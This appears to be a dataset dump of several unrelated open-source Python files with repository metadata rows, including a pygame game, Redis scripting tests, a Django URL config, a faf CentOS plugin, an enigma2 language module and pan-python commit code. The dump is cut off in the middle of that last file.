"""Run the parse() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.parse(self.context)
def _late_init(self):
"""Run the late_init() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.late_init(self.context)
def _dispatch(self):
"""Run the dispatch() method on all ingredients."""
for ingredient in self.ingredients:
result = ingredient.dispatch(self.context)
if result is not None:
return result
def _dispatch_succeeded(self):
"""Run the dispatch_succeeded() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.dispatch_succeeded(self.context)
def _dispatch_failed(self):
"""Run the dispatch_failed() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.dispatch_failed(self.context)
def _shutdown(self):
"""Run the shutdown() method on all ingredients."""
for ingredient in self.ingredients:
ingredient.shutdown(self.context)
| gpl-3.0 | 375,531,552,633,744,500 | 33.422222 | 79 | 0.657936 | false | 4.309618 | false | false | false |
Sivigik/Proutpulsor | app/main.py | 1 | 4347 | # -------------------------------------------------------------------------------
# Name: main - Proutpulsor
#
# Author: S.L-prog
#
# Licence: <GNU GENERAL PUBLIC LICENSE>
# -------------------------------------------------------------------------------
import pygame
from pygame.locals import *
# Set the screen size.
screen = pygame.display.set_mode((0,0), FULLSCREEN) #(800, 480)) #
pygame.init()
import classes
from constantes import *
import random
scrrec = screen.get_rect()
BACKGROUND = pygame.transform.scale(BACKGROUND, (scrrec.right, scrrec.bottom))
# Import the android module. If we can't import it, set it to None - this
# lets us test it, and check to see if we want android-specific behavior.
try:
import android
except ImportError:
android = None
# Event constant.
TIMEREVENT = pygame.USEREVENT
# The FPS the game runs at.
FPS = 30
def universegenerator(number_ext, number_ast, number_hamb):
extinguisher = [0]*number_ext
for i in range(0,number_ext):
extinguisher[i] = classes.Item(scrrec.center, EXTINGUISHER)
asteroid = [0]*number_ast
for i in range(0,number_ast):
randomvar = random.randint(1,4)
if randomvar == 1:
asteroid[i] = classes.Item(scrrec.center, ASTEROID1)
if randomvar == 2:
asteroid[i] = classes.Item(scrrec.center, ASTEROID2)
if randomvar == 3:
asteroid[i] = classes.Item(scrrec.center, ASTEROID3)
if randomvar == 4:
asteroid[i] = classes.Item(scrrec.center, ASTEROID4)
hamburger = [0]*number_hamb
for i in range(0,number_hamb):
hamburger[i] = classes.Item(scrrec.center, HAMBURGER)
return extinguisher, asteroid, hamburger
def displayuniverse(extinguisher, asteroid, hamburger, screen, astronautx, astronauty):
for i in range(0,len(extinguisher)):
extinguisher[i].display(screen, astronautx, astronauty)
for i in range(0,len(asteroid)):
asteroid[i].display(screen, astronautx, astronauty)
for i in range(0,len(hamburger)):
hamburger[i].display(screen, astronautx, astronauty)
def main():
astronaut = classes.Astronaut(scrrec.center)
extinguisher, asteroid, hamburger = universegenerator(50,200,50) # nombre d'items au depart
# Map the back button to the escape key.
if android:
android.init()
android.map_key(android.KEYCODE_BACK, pygame.K_ESCAPE)
#a reactiver pour python 2.7
#pygame.time.set_timer(TIMEREVENT, 1000 / FPS)
screenleft = screen.get_width()/2
screentop = screen.get_height()/2
game = True
while game:
# Android-specific:
if android:
if android.check_pause():
android.wait_for_resume()
for ev in pygame.event.get():
if ev.type == pygame.MOUSEBUTTONDOWN:
if ev.pos[0] <= screenleft:
if ev.pos[1] <= screentop:
astronaut.extinguisher_right = True
if ev.pos[1] > screentop:
astronaut.extinguisher_left = True
if ev.pos[0] > screenleft:
astronaut.fart = True
if ev.type == pygame.MOUSEBUTTONUP:
astronaut.extinguisher_right = False
astronaut.extinguisher_left = False
astronaut.fart = False
if ev.type == pygame.KEYDOWN and ev.key == pygame.K_ESCAPE:
game = False
if ev.type == pygame.KEYDOWN and ev.key == pygame.K_SPACE:
if astronaut.takeextinguisher == False:
astronaut.takeextinguisher = True
else:
astronaut.takeextinguisher = False
astronaut.mouvement()
screen.blit(BACKGROUND, (0,0))
pygame.draw.line(screen, (255, 0, 0), (screenleft, 0), (screenleft,screentop*2), 5) # afficher delimitation
pygame.draw.line(screen, (255, 0, 0), (0, screentop), (screenleft,screentop), 5) # afficher delimitation
displayuniverse(extinguisher, asteroid, hamburger, screen, astronaut.astroposition_x, astronaut.astroposition_y)
astronaut.display(screen)
pygame.display.flip()
pygame.quit()
#a reactiver pour python 2.7
#if __name__ == '__main__':
# main()
#a desactiver pour python 2.7
main() | gpl-2.0 | -286,329,088,505,806,270 | 30.737226 | 120 | 0.599264 | false | 3.359351 | false | false | false |
cardforcoin/chain-bitcoin-python | chain_bitcoin/tests/test_create_webhook.py | 2 | 1730 | from __future__ import absolute_import
import sure
from .. import Chain, NoApiKeyId, NoApiKeySecret, Webhook, create_webhook
from .mock_http_adapter import *
def test_create_webhook():
create_webhook(webhook_id=webhook_id, webhook_url=webhook_url,
api_key_id=api_key_id, api_key_secret=api_key_secret,
http_adapter=http_adapter) \
.should.equal(webhook)
def test_create_webhook_using_class():
Chain(api_key_id=api_key_id, api_key_secret=api_key_secret,
http_adapter=http_adapter) \
.create_webhook(webhook_id=webhook_id, webhook_url=webhook_url) \
.should.equal(webhook)
def test_create_webhook_without_api_key_id():
(lambda: create_webhook(webhook_id=webhook_id, webhook_url=webhook_url,
http_adapter=no_http())) \
.should.throw(NoApiKeyId)
def test_create_webhook_without_api_key_secret():
(lambda: create_webhook(webhook_id=webhook_id, webhook_url=webhook_url,
api_key_id=api_key_id, http_adapter=no_http())) \
.should.throw(NoApiKeySecret)
api_key_id = 'DEMO-4a5e1e4'
api_key_secret = 'DEMO-f8aef80',
webhook_id = 'FFA21991-5669-4728-8C83-74DEC4C93A4A'
webhook_url = 'https://username:[email protected]'
url = 'https://api.chain.com/v1/webhooks'
request_json = """
{
"id": "FFA21991-5669-4728-8C83-74DEC4C93A4A",
"url": "https://username:[email protected]"
}
"""
response_body = """
{
"id": "FFA21991-5669-4728-8C83-74DEC4C93A4A",
"url": "https://username:[email protected]"
}
"""
webhook = Webhook(
id=webhook_id,
url=webhook_url,
)
http_adapter = mock_post_json(url, request_json, response_body)
| mit | 1,479,255,687,255,157,200 | 26.460317 | 77 | 0.660116 | false | 2.831424 | false | false | false |
chop-dbhi/serrano | serrano/urls.py | 1 | 1536 | from django.conf.urls import patterns, url, include
from serrano.conf import dep_supported
# Patterns for the data namespace
data_patterns = patterns(
'',
url(r'^export/', include('serrano.resources.exporter')),
url(r'^preview/', include('serrano.resources.preview')),
)
# Patterns for the serrano namespace
serrano_patterns = patterns(
'',
url(r'^',
include('serrano.resources')),
url(r'^async/',
include('serrano.resources.async', namespace='async')),
url(r'^categories/',
include('serrano.resources.category')),
url(r'^concepts/',
include('serrano.resources.concept')),
url(r'^contexts/',
include('serrano.resources.context', namespace='contexts')),
url(r'^data/',
include(data_patterns, namespace='data')),
url(r'^fields/',
include('serrano.resources.field')),
url(r'^jobs/',
include('serrano.resources.jobs', namespace='jobs')),
url(r'^queries/',
include('serrano.resources.query', namespace='queries')),
url(r'^stats/',
include('serrano.resources.stats', namespace='stats')),
url(r'^views/',
include('serrano.resources.view', namespace='views')),
)
if dep_supported('objectset'):
# Patterns for the 'sets' namespace
serrano_patterns += patterns(
'',
url(r'^sets/', include('serrano.resources.sets', namespace='sets'))
)
# Exported patterns
urlpatterns = patterns(
'',
url(r'^', include(serrano_patterns, namespace='serrano'))
)
| bsd-2-clause | 7,945,734,449,250,110,000 | 23.380952 | 75 | 0.625651 | false | 3.737226 | false | false | false |
sorki/faf | src/pyfaf/opsys/centos.py | 2 | 8825 | # Copyright (C) 2013 ABRT Team
# Copyright (C) 2013 Red Hat, Inc.
#
# This file is part of faf.
#
# faf is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# faf is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with faf. If not, see <http://www.gnu.org/licenses/>.
from __future__ import absolute_import
import re
from pyfaf.opsys import System
from pyfaf.checker import DictChecker, IntChecker, ListChecker, StringChecker
from pyfaf.common import FafError, log
from pyfaf.queries import (get_archs,
get_arch_by_name,
get_opsys_by_name,
get_package_by_nevra,
get_releases,
get_reportpackage,
get_repos_for_opsys,
get_unknown_package)
from pyfaf.storage import (Arch,
Build,
OpSys,
OpSysReleaseStatus,
Package,
ReportPackage,
ReportUnknownPackage,
column_len)
from pyfaf.repos.yum import Yum
__all__ = ["CentOS"]
class CentOS(System):
name = "centos"
nice_name = "CentOS"
packages_checker = ListChecker(
DictChecker({
"name": StringChecker(pattern=r"^[a-zA-Z0-9_\-\.\+~]+$",
maxlen=column_len(Package,
"name")),
"epoch": IntChecker(minval=0),
"version": StringChecker(pattern=r"^[a-zA-Z0-9_\.\+]+$",
maxlen=column_len(Build, "version")),
"release": StringChecker(pattern=r"^[a-zA-Z0-9_\.\+]+$",
maxlen=column_len(Build, "release")),
"architecture": StringChecker(pattern=r"^[a-zA-Z0-9_]+$",
maxlen=column_len(Arch, "name")),
}), minlen=1
)
ureport_checker = DictChecker({
# no need to check name, version and architecture twice
# the toplevel checker already did it
# "name": StringChecker(allowed=[CentOS.name])
# "version": StringChecker()
# "architecture": StringChecker()
})
pkg_roles = ["affected", "related", "selinux_policy"]
@classmethod
def install(cls, db, logger=None):
if logger is None:
logger = log.getChildLogger(cls.__name__)
logger.info("Adding CentOS")
new = OpSys()
new.name = cls.nice_name
db.session.add(new)
db.session.flush()
@classmethod
def installed(cls, db):
return bool(get_opsys_by_name(db, cls.nice_name))
def __init__(self):
super(CentOS, self).__init__()
self.load_config_to_self("base_repo_url", ["centos.base-repo-url"],
"http://vault.centos.org/centos/$releasever/"
"os/Source/")
self.load_config_to_self("updates_repo_url", ["centos.updates-repo-url"],
"http://vault.centos.org/centos/$releasever/"
"updates/Source/")
def _save_packages(self, db, db_report, packages, count=1):
for package in packages:
role = "RELATED"
if "package_role" in package:
if package["package_role"] == "affected":
role = "CRASHED"
elif package["package_role"] == "selinux_policy":
role = "SELINUX_POLICY"
db_package = get_package_by_nevra(db,
name=package["name"],
epoch=package["epoch"],
version=package["version"],
release=package["release"],
arch=package["architecture"])
if db_package is None:
self.log_warn("Package {0}-{1}:{2}-{3}.{4} not found in "
"storage".format(package["name"],
package["epoch"],
package["version"],
package["release"],
package["architecture"]))
db_unknown_pkg = get_unknown_package(db,
db_report,
role,
package["name"],
package["epoch"],
package["version"],
package["release"],
package["architecture"])
if db_unknown_pkg is None:
db_arch = get_arch_by_name(db, package["architecture"])
if db_arch is None:
continue
db_unknown_pkg = ReportUnknownPackage()
db_unknown_pkg.report = db_report
db_unknown_pkg.name = package["name"]
db_unknown_pkg.epoch = package["epoch"]
db_unknown_pkg.version = package["version"]
db_unknown_pkg.release = package["release"]
db_unknown_pkg.arch = db_arch
db_unknown_pkg.type = role
db_unknown_pkg.count = 0
db.session.add(db_unknown_pkg)
db_unknown_pkg.count += count
continue
db_reportpackage = get_reportpackage(db, db_report, db_package)
if db_reportpackage is None:
db_reportpackage = ReportPackage()
db_reportpackage.report = db_report
db_reportpackage.installed_package = db_package
db_reportpackage.count = 0
db_reportpackage.type = role
db.session.add(db_reportpackage)
db_reportpackage.count += count
def validate_ureport(self, ureport):
CentOS.ureport_checker.check(ureport)
return True
def validate_packages(self, packages):
CentOS.packages_checker.check(packages)
for package in packages:
if ("package_role" in package and
package["package_role"] not in CentOS.pkg_roles):
raise FafError("Only the following package roles are allowed: "
"{0}".format(", ".join(CentOS.pkg_roles)))
return True
def save_ureport(self, db, db_report, ureport, packages, flush=False, count=1):
self._save_packages(db, db_report, packages, count=count)
if flush:
db.session.flush()
def get_releases(self):
return {"7": {"status": "ACTIVE"}}
def get_components(self, release):
urls = [repo.replace("$releasever", release)
for repo in [self.base_repo_url, self.updates_repo_url]]
yum = Yum(self.name, *urls)
components = list(set(pkg["name"]
for pkg in yum.list_packages(["src"])))
return components
#def get_component_acls(self, component, release=None):
# return {}
def get_build_candidates(self, db):
return (db.session.query(Build)
.filter(Build.release.like("%%.el%%"))
.all())
def check_pkgname_match(self, packages, parser):
for package in packages:
if ("package_role" not in package or
package["package_role"].lower() != "affected"):
continue
nvra = "{0}-{1}-{2}.{3}".format(package["name"],
package["version"],
package["release"],
package["architecture"])
match = parser.match(nvra)
if match is not None:
return True
return False
| gpl-3.0 | -8,390,464,450,429,315,000 | 40.238318 | 83 | 0.475581 | false | 4.757412 | false | false | false |
anthonyalmarza/trex | tests/test_scripting.py | 1 | 6913 | import sys
import hashlib
import trex
from trex import redis
from twisted.internet import defer
from twisted.trial import unittest
from twisted.internet import reactor
from twisted.python import failure
from .mixins import Redis26CheckMixin, REDIS_HOST, REDIS_PORT
class TestScripting(unittest.TestCase, Redis26CheckMixin):
_SCRIPT = "return {KEYS[1],KEYS[2],ARGV[1],ARGV[2]}" # From redis example
@defer.inlineCallbacks
def setUp(self):
self.db = yield redis.Connection(REDIS_HOST, REDIS_PORT,
reconnect=False)
self.db1 = None
self.redis_2_6 = yield self.is_redis_2_6()
yield self.db.script_flush()
@defer.inlineCallbacks
def tearDown(self):
yield self.db.disconnect()
if self.db1 is not None:
yield self.db1.disconnect()
@defer.inlineCallbacks
def test_eval(self):
self._skipCheck()
keys = ('key1', 'key2')
args = ('first', 'second')
r = yield self.db.eval(self._SCRIPT, keys, args)
self._check_eval_result(keys, args, r)
r = yield self.db.eval("return 10")
self.assertEqual(r, 10)
r = yield self.db.eval("return {1,2,3.3333,'foo',nil,'bar'}")
self.assertEqual(r, [1, 2, 3, "foo"])
# Test the case where the hash is in script_hashes,
# but redis doesn't have it
h = self._hash_script(self._SCRIPT)
yield self.db.script_flush()
conn = yield self.db._factory.getConnection(True)
conn.script_hashes.add(h)
r = yield self.db.eval(self._SCRIPT, keys, args)
self._check_eval_result(keys, args, r)
@defer.inlineCallbacks
def test_eval_keys_only(self):
self._skipCheck()
keys = ['foo', 'bar']
args = []
r = yield self.db.eval("return {KEYS[1],KEYS[2]}", keys, args)
self.assertEqual(r, keys)
r = yield self.db.eval("return {KEYS[1],KEYS[2]}", keys=keys)
self.assertEqual(r, keys)
@defer.inlineCallbacks
def test_eval_args_only(self):
self._skipCheck()
keys = []
args = ['first', 'second']
r = yield self.db.eval("return {ARGV[1],ARGV[2]}", keys, args)
self.assertEqual(r, args)
r = yield self.db.eval("return {ARGV[1],ARGV[2]}", args=args)
self.assertEqual(r, args)
@defer.inlineCallbacks
def test_eval_error(self):
self._skipCheck()
try:
result = yield self.db.eval('return {err="My Error"}')
except trex.exceptions.ResponseError:
pass
except:
raise self.failureException('%s raised instead of %s:\n %s'
% (sys.exc_info()[0],
'trex.exceptions.ResponseError',
failure.Failure().getTraceback()))
else:
raise self.failureException('%s not raised (%r returned)'
% ('trex.exceptions.ResponseError', result))
@defer.inlineCallbacks
def test_evalsha(self):
self._skipCheck()
r = yield self.db.eval(self._SCRIPT)
h = self._hash_script(self._SCRIPT)
r = yield self.db.evalsha(h)
self._check_eval_result([], [], r)
@defer.inlineCallbacks
def test_evalsha_error(self):
self._skipCheck()
h = self._hash_script(self._SCRIPT)
try:
result = yield self.db.evalsha(h)
except trex.exceptions.ScriptDoesNotExist:
pass
except:
raise self.failureException('%s raised instead of %s:\n %s'
% (sys.exc_info()[0],
'trex.exceptions.ScriptDoesNotExist',
failure.Failure().getTraceback()))
else:
raise self.failureException('%s not raised (%r returned)'
% ('trex.exceptions.ResponseError', result))
@defer.inlineCallbacks
def test_script_load(self):
self._skipCheck()
h = self._hash_script(self._SCRIPT)
r = yield self.db.script_exists(h)
self.assertFalse(r)
r = yield self.db.script_load(self._SCRIPT)
self.assertEqual(r, h)
r = yield self.db.script_exists(h)
self.assertTrue(r)
@defer.inlineCallbacks
def test_script_exists(self):
self._skipCheck()
h = self._hash_script(self._SCRIPT)
script1 = "return 1"
h1 = self._hash_script(script1)
r = yield self.db.script_exists(h)
self.assertFalse(r)
r = yield self.db.script_exists(h, h1)
self.assertEqual(r, [False, False])
yield self.db.script_load(script1)
r = yield self.db.script_exists(h, h1)
self.assertEqual(r, [False, True])
yield self.db.script_load(self._SCRIPT)
r = yield self.db.script_exists(h, h1)
self.assertEqual(r, [True, True])
@defer.inlineCallbacks
def test_script_kill(self):
self._skipCheck()
try:
result = yield self.db.script_kill()
except trex.exceptions.NoScriptRunning:
pass
except:
raise self.failureException('%s raised instead of %s:\n %s'
% (sys.exc_info()[0],
'trex.exceptions.NoScriptRunning',
failure.Failure().getTraceback()))
else:
raise self.failureException('%s not raised (%r returned)'
% ('trex.exceptions.ResponseError', result))
# Run an infinite loop script from one connection
# and kill it from another.
inf_loop = "while 1 do end"
self.db1 = yield redis.Connection(REDIS_HOST, REDIS_PORT,
reconnect=False)
eval_deferred = self.db1.eval(inf_loop)
reactor.iterate()
r = yield self.db.script_kill()
self.assertEqual(r, 'OK')
try:
result = yield eval_deferred
except trex.exceptions.ResponseError:
pass
except:
raise self.failureException('%s raised instead of %s:\n %s'
% (sys.exc_info()[0],
'trex.exceptions.ResponseError',
failure.Failure().getTraceback()))
else:
raise self.failureException('%s not raised (%r returned)'
% ('trex.exceptions.ResponseError', result))
def _check_eval_result(self, keys, args, r):
self.assertEqual(r, list(keys) + list(args))
def _hash_script(self, script):
return hashlib.sha1(script).hexdigest()
| mit | -6,848,204,817,567,871,000 | 36.166667 | 84 | 0.54101 | false | 4.097807 | true | false | false |
jfterpstra/bluebottle | bluebottle/recurring_donations/serializers.py | 1 | 1038 | from bluebottle.recurring_donations.models import (MonthlyDonor,
MonthlyDonorProject)
from rest_framework import serializers
from bluebottle.donations.models import Donation
from bluebottle.projects.models import Project
class MonthlyDonationProjectSerializer(serializers.ModelSerializer):
project = serializers.SlugRelatedField(many=False, slug_field='slug',
queryset=Project.objects)
donation = serializers.PrimaryKeyRelatedField(source='donor',
queryset=MonthlyDonor.objects)
class Meta():
model = MonthlyDonorProject
fields = ('id', 'donation', 'project')
class MonthlyDonationSerializer(serializers.ModelSerializer):
projects = MonthlyDonationProjectSerializer(many=True, read_only=True)
class Meta():
model = MonthlyDonor
fields = ('id', 'amount', 'iban', 'bic', 'active', 'name', 'city',
'country', 'projects')
| bsd-3-clause | -5,822,631,650,316,790,000 | 40.52 | 80 | 0.636802 | false | 4.654709 | false | false | false |
polymorphm/tpl-txt-gen | lib_tpl_txt_gen_2012_09_27/tpl_txt_gen.py | 1 | 4774 | # -*- mode: python; coding: utf-8 -*-
#
# Copyright 2012, 2013 Andrej A Antonov <[email protected]>.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
assert str is not bytes
import os, os.path, weakref, importlib
from mako import lookup as mako_lookup
from . import get_items
class TplTxtGenEnviron(object):
pass
class ItemFunc(object):
def __init__(self, get_iter):
self._get_iter = get_iter
self._group_map = {}
def __call__(self, path, group=None):
if group is None:
return next(self._get_iter(path))
try:
text = self._group_map[group]
except KeyError:
self._group_map[group] = text = next(self._get_iter(path))
return text
class ItemFuncFactory(object):
def __init__(self, environ_ref):
self._environ_ref = environ_ref
self._iter_map = {}
def __call__(self):
return ItemFunc(self._get_iter)
def _resolve_path(self, path):
root_dir = self._environ_ref().root_dir
return os.path.join(root_dir, path)
def _get_iter(self, path):
try:
it = self._iter_map[path]
except KeyError:
self._iter_map[path] = it = \
get_items.get_random_infinite_items(self._resolve_path(path))
return it
class CustomFunc(object):
def __init__(self, get_impl):
self._get_impl = get_impl
self._impl_map = {}
def __call__(self, custom_name):
try:
impl = self._impl_map[custom_name]
except KeyError:
self._impl_map[custom_name] = impl = self._get_impl(custom_name)()
return impl
class CustomFuncFactory(object):
def __init__(self, environ_ref):
self._environ_ref = environ_ref
self._impl_map = {}
def __call__(self):
return CustomFunc(self._get_impl)
def _get_impl(self, custom_name):
try:
impl = self._impl_map[custom_name]
except KeyError:
func_name, module_name = custom_name.rsplit(':', 1)
mod = importlib.import_module(module_name)
factory = mod.FUNC_FACTORY_MAP[func_name]
self._impl_map[custom_name] = impl = factory(self._environ_ref)
return impl
FUNC_FACTORY_MAP = {
'item': ItemFuncFactory,
'custom': CustomFuncFactory,
}
DEFAULT_FUNC_FACTORY_MAP = FUNC_FACTORY_MAP
def count_iter(count):
if count is not None:
for i in range(count):
# TODO: for Python-3.3+ -- need fix to PEP-0380
yield i
else:
while True:
yield
def tpl_txt_gen_iter(tpl_path, count=None,
environ=None, func_factory_map=None):
if environ is None:
environ = TplTxtGenEnviron()
environ.tpl_path = tpl_path
environ.count = count
environ.root_dir = os.path.dirname(environ.tpl_path)
environ.tpl_name = os.path.basename(environ.tpl_path)
environ.tpl_lookup = mako_lookup.TemplateLookup(directories=(environ.root_dir, ))
environ.tpl = environ.tpl_lookup.get_template(environ.tpl_name)
if func_factory_map is None:
func_factory_map = DEFAULT_FUNC_FACTORY_MAP
func_factories = {
func_name:
func_factory_map[func_name](weakref.ref(environ))
for func_name in func_factory_map
}
for i in count_iter(environ.count):
tpl_kwargs = {
func_name:
func_factories[func_name]()
for func_name in func_factories
}
yield environ.tpl.render(**tpl_kwargs)
def tpl_txt_gen(tpl_path, out_path, count):
out_path_created = False
for i, text in enumerate(tpl_txt_gen_iter(tpl_path, count=count)):
if not out_path_created:
os.mkdir(out_path)
out_path_created = True
out_name = 'out-{}.txt'.format(i)
full_out_path = os.path.join(out_path, out_name)
with open(full_out_path, 'w', encoding='utf-8', newline='\n') as fd:
fd.write(text)
| gpl-3.0 | 6,140,002,801,200,075,000 | 29.8 | 85 | 0.592585 | false | 3.726776 | false | false | false |
kingvuplus/nn-gui | lib/python/Components/Language.py | 1 | 5367 | import gettext
from Tools.Directories import SCOPE_LANGUAGE, resolveFilename, fileExists
import language_cache
class Language:
def __init__(self):
gettext.install('enigma2', resolveFilename(SCOPE_LANGUAGE, ""), unicode=0, codeset="utf-8")
self.activeLanguage = 0
self.lang = {}
self.langlist = []
# FIXME make list dynamically
# name, iso-639 language, iso-3166 country. Please don't mix language&country!
# also, see "precalcLanguageList" below on how to re-create the language cache after you added a language
language_path = "/usr/share/enigma2/po/%s/LC_MESSAGES/enigma2.mo"
if fileExists(language_path % "en"):
self.addLanguage(_("English"), "en", "EN")
if fileExists(language_path % "de"):
self.addLanguage(_("German"), "de", "DE")
if fileExists(language_path % "ar"):
self.addLanguage(_("Arabic"), "ar", "AE")
if fileExists(language_path % "ca"):
self.addLanguage(_("Catalan"), "ca", "AD")
if fileExists(language_path % "hr"):
self.addLanguage(_("Croatian"), "hr", "HR")
if fileExists(language_path % "cs"):
self.addLanguage(_("Czech"), "cs", "CZ")
if fileExists(language_path % "da"):
self.addLanguage(_("Danish"), "da", "DK")
if fileExists(language_path % "nl"):
self.addLanguage(_("Dutch"), "nl", "NL")
if fileExists(language_path % "et"):
self.addLanguage(_("Estonian"), "et", "EE")
if fileExists(language_path % "fi"):
self.addLanguage(_("Finnish"), "fi", "FI")
if fileExists(language_path % "fr"):
self.addLanguage(_("French"), "fr", "FR")
if fileExists(language_path % "el"):
self.addLanguage(_("Greek"), "el", "GR")
if fileExists(language_path % "hu"):
self.addLanguage(_("Hungarian"), "hu", "HU")
if fileExists(language_path % "lt"):
self.addLanguage(_("Lithuanian"), "lt", "LT")
if fileExists(language_path % "lv"):
self.addLanguage(_("Latvian"), "lv", "LV")
if fileExists(language_path % "is"):
self.addLanguage(_("Icelandic"), "is", "IS")
if fileExists(language_path % "it"):
self.addLanguage(_("Italian"), "it", "IT")
if fileExists(language_path % "no"):
self.addLanguage(_("Norwegian"), "no", "NO")
if fileExists(language_path % "pl"):
self.addLanguage(_("Polish"), "pl", "PL")
if fileExists(language_path % "pt"):
self.addLanguage(_("Portuguese"), "pt", "PT")
if fileExists(language_path % "ru"):
self.addLanguage(_("Russian"), "ru", "RU")
if fileExists(language_path % "sr"):
self.addLanguage(_("Serbian"), "sr", "YU")
if fileExists(language_path % "sk"):
self.addLanguage(_("Slovakian"), "sk", "SK")
if fileExists(language_path % "sl"):
self.addLanguage(_("Slovenian"), "sl", "SI")
if fileExists(language_path % "es"):
self.addLanguage(_("Spanish"), "es", "ES")
if fileExists(language_path % "sv"):
self.addLanguage(_("Swedish"), "sv", "SE")
if fileExists(language_path % "tr"):
self.addLanguage(_("Turkish"), "tr", "TR")
if fileExists(language_path % "uk"):
self.addLanguage(_("Ukrainian"), "uk", "UA")
if fileExists(language_path % "fy"):
self.addLanguage(_("Frisian"), "fy", "x-FY") # there is no separate country for frisian
self.callbacks = []
def addLanguage(self, name, lang, country):
try:
self.lang[str(lang + "_" + country)] = ((_(name), lang, country))
self.langlist.append(str(lang + "_" + country))
except:
print "Language " + str(name) + " not found"
def activateLanguage(self, index):
try:
lang = self.lang[index]
print "Activating language " + lang[0]
gettext.translation('enigma2', resolveFilename(SCOPE_LANGUAGE, ""), languages=[lang[1]]).install()
self.activeLanguage = index
for x in self.callbacks:
x()
except:
print "Selected language does not exist!"
lang = self.lang["en_EN"]
print "Activating default language " + lang[0]
gettext.translation('enigma2', resolveFilename(SCOPE_LANGUAGE, ""), languages=[lang[1]]).install()
self.activeLanguage = "en_EN"
for x in self.callbacks:
x()
def activateLanguageIndex(self, index):
if index < len(self.langlist):
self.activateLanguage(self.langlist[index])
def getLanguageList(self):
return [ (x, self.lang[x]) for x in self.langlist ]
def getActiveLanguage(self):
return self.activeLanguage
def getActiveLanguageIndex(self):
idx = 0
for x in self.langlist:
if x == self.activeLanguage:
return idx
idx += 1
return 0
def getLanguage(self):
try:
return str(self.lang[self.activeLanguage][1]) + "_" + str(self.lang[self.activeLanguage][2])
except:
return 'en_EN'
def addCallback(self, callback):
self.callbacks.append(callback)
def precalcLanguageList(self):
# excuse me for those T1, T2 hacks please. The goal was to keep the language_cache.py as small as possible, *and*
# don't duplicate these strings.
T1 = _("Please use the UP and DOWN keys to select your language. Afterwards press the OK button.")
T2 = _("Language selection")
l = open("language_cache.py", "w")
print >>l, "# -*- coding: UTF-8 -*-"
print >>l, "LANG_TEXT = {"
for language in self.langlist:
self.activateLanguage(language)
print >>l, '"%s": {' % language
for name, lang, country in self.lang.values():
print >>l, '\t"%s_%s": "%s",' % (lang, country, _(name))
print >>l, '\t"T1": "%s",' % (_(T1))
print >>l, '\t"T2": "%s",' % (_(T2))
print >>l, '},'
print >>l, "}"
language = Language()
| gpl-2.0 | 8,769,935,896,946,912,000 | 35.263514 | 116 | 0.642631 | false | 2.991639 | false | false | false |
PaloAltoNetworks-BD/SplunkforPaloAltoNetworks | Splunk_TA_paloalto/bin/lib/pan-python/lib/pan/commit.py | 2 | 5068 | #
# Copyright (c) 2013-2014 Kevin Steves <[email protected]>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
from __future__ import print_function
import sys
import logging
from . import DEBUG1, DEBUG2, DEBUG3
_valid_part = set([
'device-and-network-excluded',
'policy-and-objects-excluded',
'shared-object-excluded',
'no-vsys',
'vsys',
])
_part_xml = {
'device-and-network-excluded':
'<device-and-network>excluded</device-and-network>',
'policy-and-objects-excluded':
'<policy-and-objects>excluded</policy-and-objects>',
'shared-object-excluded':
'<shared-object>excluded</shared-object>',
'no-vsys':
'<no-vsys></no-vsys>',
'vsys':
'<member>%s</member>',
}
def valid_part(part):
return part in _valid_part
class PanCommit:
def __init__(self,
validate=False,
force=False,
commit_all=False,
merge_with_candidate=False):
self._log = logging.getLogger(__name__).log
self._validate = validate
self._force = force
self._commit_all = commit_all
self._merge_with_candidate = merge_with_candidate
self.partial = set()
self._vsys = set()
self._device = None
self._device_group = None
def validate(self):
self._validate = True
def force(self):
self._force = True
def commit_all(self):
self._commit_all = True
def merge_with_candidate(self):
self._merge_with_candidate = True
def device_and_network_excluded(self):
part = 'device-and-network-excluded'
self.partial.add(part)
def policy_and_objects_excluded(self):
part = 'policy-and-objects-excluded'
self.partial.add(part)
def shared_object_excluded(self):
part = 'shared-object-excluded'
self.partial.add(part)
def no_vsys(self):
part = 'no-vsys'
self.partial.add(part)
def vsys(self, vsys):
if not self._commit_all:
part = 'vsys'
self.partial.add(part)
if type(vsys) == type(''):
vsys = [vsys]
for name in vsys:
self._vsys.add(name)
def device(self, serial):
self._device = serial
def device_group(self, device_group):
self._device_group = device_group
def cmd(self):
if self._commit_all:
return self.__commit_all()
else:
return self.__commit()
def __commit_all(self):
s = '<commit-all><shared-policy>'
if self._device:
s += '<device>%s</device>' % self._device
if self._device_group:
s += '<device-group>%s</device-group>' % self._device_group
# default when no <merge-with-candidate-cfg/> is 'yes'
# we default to 'no' like the Web UI
merge_xml = '<merge-with-candidate-cfg>%s</merge-with-candidate-cfg>'
if self._merge_with_candidate:
